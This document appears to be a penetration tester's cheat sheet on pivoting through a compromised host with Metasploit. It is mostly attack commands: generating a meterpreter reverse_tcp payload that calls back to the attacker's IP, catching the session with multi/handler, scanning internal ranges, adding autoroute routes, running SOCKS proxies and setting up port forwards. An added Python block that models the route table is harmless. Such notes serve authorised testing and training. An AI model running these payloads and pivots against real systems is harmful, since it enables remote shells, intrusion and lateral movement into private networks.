Pivoting
1. Meterpreter session
Exploitation done with Metasploit:
We already have the meterpreter session.
Exploitation not done with Metasploit:
First generate the executable payload
./msfpayload windows/meterpreter/reverse_tcp lhost={My IP} lport={port} X > /tmp/iambad.exe
Then we copy the executable payload to the victim machine.
After that, on our machine we start Metasploit and the handler:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set lhost {My IP}
set lport {Port we selected on payload}
run
Then we run the payload on the victim machine, and on our machine we should get the meterpreter session.
2. Network Interface Discovery
Once we compromise the victim machine we can discover new network interfaces.
Linux:
ip a
hostname -I
Windows:
ipconfig
arp -a
3. Hosts Discovery
Metasploit payloads to discover new hosts:
Linux:
Windows:
meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24
(Here we put 7.7.7.0/24 because we have found a new network interface at 7.7.7.14 and we want to scan the whole range to discover new machines)
Manual host discovery (as in the "Methodology w/ Chisel" section)
4. Pivoting
Autoroute
Once we discover a new network interface we need to run autoroute in the meterpreter session.
Example: we discovered 7.7.7.11 in the previous host scan and we need to add a route to reach the machines in that range:
meterpreter > run autoroute -s 7.7.7.0/24
or
route add 3.3.3.0 255.255.255.0
or a simpler approach:
use multi/manage/autoroute
set session 1
exploit
Then we can run
meterpreter > run autoroute -p
to see the active routing table.
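Model of the pivot route table that the autoroute / route add commands above build. This is an added example, not Metasploit's own code: it reproduces the lookup rule (the most specific matching route wins) so that a tester can document, and a defender can reconstruct from the commands recorded in a session, which internal ranges became reachable through which compromised host. Session numbers in the sample are assumed, since the notes above omit them.

```python
"""Model of the Metasploit pivot route table (added example, not Metasploit code)."""
import ipaddress
import shlex


def parse_route_cmd(cmd: str, session: int):
    """Turn one `route add <net> <mask>` or `[run] autoroute -s <cidr>` line
    into an (IPv4Network, session) pair. `session` is the meterpreter session
    the command was run in (assumed; the notes omit the session id)."""
    parts = shlex.split(cmd)
    if parts[:2] == ["route", "add"]:
        net, mask = parts[2], parts[3]
        return ipaddress.ip_network(f"{net}/{mask}", strict=False), session
    if "autoroute" in parts and "-s" in parts:
        cidr = parts[parts.index("-s") + 1]
        return ipaddress.ip_network(cidr, strict=False), session
    raise ValueError(f"unsupported command: {cmd}")


def build_table(commands):
    """commands: iterable of (command_string, session_id) pairs."""
    return [parse_route_cmd(cmd, sess) for cmd, sess in commands]


def resolve(table, dest: str):
    """Return the session id whose route covers `dest` (longest prefix wins),
    or None when no pivot route applies and traffic would leave directly."""
    addr = ipaddress.ip_address(dest)
    matches = [(net, sess) for net, sess in table if addr in net]
    if not matches:
        return None
    _net, sess = max(matches, key=lambda m: m[0].prefixlen)
    return sess


# Constructed sample: the two routes from the notes, attributed to sessions
# 1 and 2 (session numbers assumed for the illustration).
SAMPLE_COMMANDS = [
    ("run autoroute -s 7.7.7.0/24", 1),
    ("route add 3.3.3.0 255.255.255.0", 2),
]

if __name__ == "__main__":
    table = build_table(SAMPLE_COMMANDS)
    for host in ("7.7.7.11", "3.3.3.3", "8.8.8.8"):
        print(host, "->", resolve(table, host))  # 1, 2, None
```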
First Pivot
First of all we put the meterpreter session in the background:
background
Then we start the proxy server:
msf > use auxiliary/server/socks4a
set srvhost 127.0.0.1
exploit -j
Then, to execute another exploit against the new machine, we type "back" and run the exploit we want against the new machine.
Second Pivot
First of all we put the meterpreter session in the background:
background
Then we start the proxy server:
msf > use auxiliary/server/socks4a
set srvhost {My IP}
set srvport 777
(Here we need to select another port: the default is 1080, as with chisel, but that one is already in use, so we pick another one, following the same port selection as in "Methodology w/ Chisel")
run
Then, to execute another exploit against the new machine, we type "back" and run the exploit we want against the new machine.
To run other tools we need to add the corresponding proxies created with Metasploit to the Proxychains config file; here we follow the same methodology as in the "Methodology w/ Chisel" section.
5. Port Forwarding
If we also want to do port forwarding:
portfwd add -L 127.0.0.1 -l 443 -r 3.3.3.3 -p 3389
--> Create a rule to open port 443 on the attack machine and forward it through the session to target 3.3.3.3 on port 3389
portfwd delete -L 127.0.0.1 -l 443 -r 3.3.3.3 -p 3389
--> Delete the rule that opens port 443 on the attack machine and forwards it through the session to target 3.3.3.3 on port 3389
portfwd add -l 8161 -p 8161 -r 10.9.20.12